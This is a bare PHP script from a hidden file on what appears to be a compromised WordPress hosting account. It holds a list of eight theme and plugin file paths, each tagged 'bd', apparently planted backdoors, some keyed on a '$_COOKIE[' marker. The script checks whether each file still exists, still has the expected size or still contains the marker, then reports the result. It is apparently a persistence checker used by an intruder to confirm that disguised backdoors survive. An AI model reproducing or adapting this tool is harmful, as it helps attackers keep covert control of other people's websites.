File: //usr/tmp/.internal
<?php $r = '/home1/loraoliv/public_html'; $x = ["/shows/wp-content/themes/bucket/wpgrade-core/vendor/redux3/inc/fields/ace_editor/field.ace.editor.php"=>"bd@@99603@@684",
"/max/wp-content/plugins/constant-contact-api/vendor/giggsey/libphonenumber-for-php/Tests/libphonenumber/Tests/prefixmapper/show_intro.php"=>"bd@@656663@@1078",
"/shows/wp-content/themes/cityrama/framework/modules/title/types/centered/admin/meta-boxes/centered.title.meta.boxes.php"=>"bd@@72756@@380",
"/shows/wp-content/plugins/nextend-smart-slider3-pro/Nextend/SmartSlider3Pro/Generator/Common/Instagram/api/Partition.class.php"=>"bd@@111942@@1820",
"/max/wp-content/plugins/constant-contact-api/vendor/giggsey/libphonenumber-for-php/src/libphonenumber/geocoding/data/es/makepdf_config.php"=>"bd@@601473@@1049",
"/shows/wp-content/plugins/google-analytics-for-wordpress/vendor/yoast/license-manager/samples/index.php"=>"bd@@142475@@$_COOKIE[1",
"/wp-content/plugins/woocommerce/woocommerce.php"=>"bd@@54946@@$_COOKIE[-",
"/shows/wp-content/plugins/woocommerce/includes/wc-widget-functions.php"=>"bd@@691399@@2766"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');